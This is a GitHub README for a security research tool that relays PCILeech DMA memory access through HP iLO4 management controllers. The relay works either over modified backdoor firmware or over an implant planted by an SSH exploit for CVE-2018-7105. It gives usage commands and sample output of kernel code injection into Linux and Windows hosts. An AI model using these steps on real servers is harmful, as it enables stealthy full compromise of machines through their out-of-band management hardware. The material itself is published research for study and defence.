Skip to content

Synacktiv-contrib/pcileech_hpilo4_service

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits

README.md

README.md

 
 

mod_backdoor.py

mod_backdoor.py

 
 

mod_ssh_exploit.py

mod_ssh_exploit.py

 
 

run.py

run.py

 
 

Repository files navigation

PCILeech HP iLO4 Service

This is a Python service relaying read and write queries from PCILeech to an HP iLO4 device flashed with a modified firmware.

Usage

$ python run.py -h
usage: run.py [-h] [-m MODULE] [-u USER] [-p PASSWORD] [-P PORT] [-v]
              remote_addr

HP iLO4 PCILeech service

positional arguments:
  remote_addr           IP address of the target iLO4 interface

optional arguments:
  -h, --help            show this help message and exit
  -m MODULE, --module MODULE
                        Module to use (backdoor, ssh_exploit)
  -u USER, --user USER  user name
  -p PASSWORD, --password PASSWORD
                        SSH password
  -P PORT, --port PORT  SSH port
  -v, --verbose         verbosity

Modules

backdoor

This modules uses the modified firmware developped as a demonstration for the SSTIC presentation.

Tools to build and flash this firmware are available on the ilo4_toolbox repository.

/pcileech_hpilo4_service$ python run.py -m backdoor 192.168.42.78

---

$ time ./pcileech kmdload -vvv -device rawtcp -device-addr 127.0.0.1 -device-port 8888 -kmd LINUX_X64_48 

 Current Action: Scanning for Linux kernel base
 Access Mode:    DMA (hardware only)
 Progress:       748 / 268435422 (0%)
 Speed:          6 MB/s
 Address:        0x000000002FA00000
 Pages read:     191488 / 68719468032 (0%)
 Pages failed:   0 (0%)

 Current Action: Verifying Linux kernel base
 Access Mode:    DMA (hardware only)
 Progress:       32 / 32 (100%)
 Speed:          1 MB/s
 Address:        0x0000000031A00000
 Pages read:     8192 / 8192 (100%)
 Pages failed:   0 (0%)
KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
KMD: Successfully loaded at address: 0x76680000

real    2m38.038s

ssh_exploit

This modules uses the in-memory implant installed by the SSH service exploit (CVE-2018-7105) written by IooNag.

The exploit is available on the ilo4_toolbox repository and should be run before using this service.

Dumping large amounts of memory using this modules is not recommended. Therefore, don't use it for a Linux system since dumping 16MB of kernel memory is required.

/pcileech_hpilo4_service$ python run.py -v -m ssh_exploit -u admin -p password 192.168.42.78

---

$ time ./pcileech kmdload -vvv -device rawtcp -device-addr 127.0.0.1 -device-port 8888 -kmd WIN10_X64

KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
KMD: Successfully loaded at address: 0x7fffe000

real	1m0.826s
user	0m0.000s
sys	0m0.010s

About

PCILeech HP iLO4 Service

Resources

Readme
Activity

Stars

20 stars

Watchers

1 watching

Forks

6 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages